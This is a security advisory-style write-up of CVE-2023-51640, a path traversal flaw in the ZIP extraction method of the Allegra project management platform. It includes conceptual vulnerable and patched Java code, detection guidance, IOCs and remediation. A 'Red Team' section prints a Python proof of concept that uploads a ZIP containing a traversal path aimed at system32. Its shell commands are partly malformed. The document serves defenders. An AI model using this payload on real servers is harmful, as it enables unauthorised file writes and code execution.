CVE-2023-51640
Executive Summary
CVE-2023-51640 is a critical directory traversal vulnerability in Allegra, a project management and collaboration platform. The flaw resides in the extarctZippedFile method, where improper validation of user-supplied paths allows an authenticated attacker to write arbitrary files to the filesystem. This can be leveraged to achieve remote code execution (RCE) in the context of the LOCAL SERVICE account. The vulnerability has a CVSS score of 7.2 (High) and is currently unpatched. No public proof-of-concept (PoC) or exploit code has been released, but the risk remains significant due to the potential for authentication bypass.

CVSS Breakdown & Threat Level
- CVSS Score: 7.2 (High)
- Attack Vector: Network (AV:N)
- Attack Complexity: Low (AC:L)
- Privileges Required: Low (PR:L) – authentication is required but can be bypassed.
- User Interaction: None (UI:N)
- Scope: Unchanged (S:U)
- Confidentiality Impact: High (C:H)
- Integrity Impact: High (I:H)
- Availability Impact: High (A:H)
The threat level is elevated due to the authentication bypass capability, which effectively reduces the required privileges to none. An attacker can exploit this to gain full control over the affected system.
Deep Dive & Mechanics
The vulnerability is a classic path traversal (directory traversal) flaw in the extarctZippedFile method. This method is designed to extract a ZIP archive to a specified directory. However, it fails to sanitize the user-supplied path, allowing an attacker to include ../ sequences to escape the intended extraction directory.
Attack Flow:
- Authentication Bypass: The attacker first exploits an authentication bypass vulnerability (referenced in the ZDI report) to gain access to the application without valid credentials.
- Craft Malicious ZIP: The attacker creates a ZIP archive containing a file with a path traversal payload (e.g.,
../../windows/system32/malicious.dll). - Trigger Extraction: The attacker sends a request to the
extarctZippedFilemethod with the malicious ZIP and a crafted destination path. - File Write: The method extracts the file to the attacker-controlled path, overwriting a legitimate system file or placing a malicious file in a startup directory.
- Code Execution: The attacker then triggers execution of the malicious file (e.g., by restarting a service or waiting for a scheduled task), achieving RCE as LOCAL SERVICE.
The LOCAL SERVICE account has limited privileges but can still be used to escalate to SYSTEM or perform lateral movement.
Vulnerable vs. Patched Code
Vulnerable Code (Conceptual):
public void extarctZippedFile(String zipPath, String destDir) {
ZipInputStream zis = new ZipInputStream(new FileInputStream(zipPath));
ZipEntry entry;
while ((entry = zis.getNextEntry()) != null) {
String entryName = entry.getName();
// VULNERABLE: No path validation
File outputFile = new File(destDir, entryName);
// ... extract to outputFile
}
}
Patched Code (Conceptual):
public void extarctZippedFile(String zipPath, String destDir) {
ZipInputStream zis = new ZipInputStream(new FileInputStream(zipPath));
ZipEntry entry;
while ((entry = zis.getNextEntry()) != null) {
String entryName = entry.getName();
// PATCH: Validate and sanitize the path
File outputFile = new File(destDir, entryName);
String canonicalDest = new File(destDir).getCanonicalPath();
String canonicalOutput = outputFile.getCanonicalPath();
if (!canonicalOutput.startsWith(canonicalDest)) {
throw new SecurityException("Path traversal detected");
}
// ... extract to outputFile
}
}
The patched code uses getCanonicalPath() to resolve all ../ sequences and then checks that the resulting path is within the intended destination directory.
Exploitation & Lab Setup
Red Team
Prerequisites:
- Access to an Allegra instance (authentication bypass assumed).
- Ability to upload a ZIP file.
Steps:
- Create Malicious ZIP:
# Create a file with a path traversal payload echo "malicious content" > payload.txt # Add it to a ZIP with a traversal path zip -r exploit.zip ../../windows/system32/malicious.dll # Note: The file inside the ZIP should have the traversal path as its name - Upload and Trigger:
import requests import zipfile import io # Create the malicious ZIP in memory zip_buffer = io.BytesIO() with zipfile.ZipFile(zip_buffer, 'w') as zf: zf.writestr('../../windows/system32/malicious.dll', 'malicious content') zip_buffer.seek(0) # Send the request (adjust URL and parameters as needed) url = "http://target/allegra/extarctZippedFile" files = {'file': ('exploit.zip', zip_buffer, 'application/zip')} data = {'destDir': 'C:\\ProgramData\\Allegra\\uploads'} response = requests.post(url, files=files, data=data, auth=('user', 'pass')) - Execute Payload: Trigger the malicious DLL (e.g., by restarting a service that loads from
system32).
Blue Team
Detection:
- Monitor for unusual file writes to system directories (e.g.,
C:\Windows\System32,C:\ProgramData). - Alert on ZIP file uploads containing path traversal patterns in entry names.
- Use file integrity monitoring (FIM) to detect changes to critical system files.
Hunting:
- Search logs for
extarctZippedFilemethod calls with suspiciousdestDirparameters. - Look for processes spawned by the LOCAL SERVICE account that are not typical.
Indicators of Compromise (IOCs)
- File System:
- Unexpected files in
C:\Windows\System32,C:\ProgramData, or other system directories. - Files with names containing
../or other traversal sequences.
- Unexpected files in
- Network:
- POST requests to
/allegra/extarctZippedFilewith multipart form data containing ZIP files.
- POST requests to
- Process:
- Processes running as LOCAL SERVICE that are not part of the normal Allegra installation.
- Logs:
- Application logs showing extraction to paths outside the intended directory.

Remediation & Mitigation
Immediate Actions:
- Isolate Affected Systems: Disconnect Allegra instances from the network if possible.
- Apply Workaround: If patching is not available, restrict access to the
extarctZippedFileendpoint via web application firewall (WAF) rules or network ACLs. - Monitor Logs: Enable detailed logging for file operations and review for suspicious activity.
Long-Term Fix:
- Vendor Patch: Await an official patch from Allegra that implements proper path validation (as shown in the patched code example).
- Code Review: If source code is available, implement canonical path checks in all file operations.
- Authentication Hardening: Fix the authentication bypass vulnerability to prevent unauthenticated exploitation.
Compensating Controls:
- Use a WAF to block requests containing path traversal patterns (
../,..\\). - Implement file integrity monitoring (FIM) on critical system directories.
- Run Allegra with the least privileges necessary (avoid LOCAL SERVICE if possible).
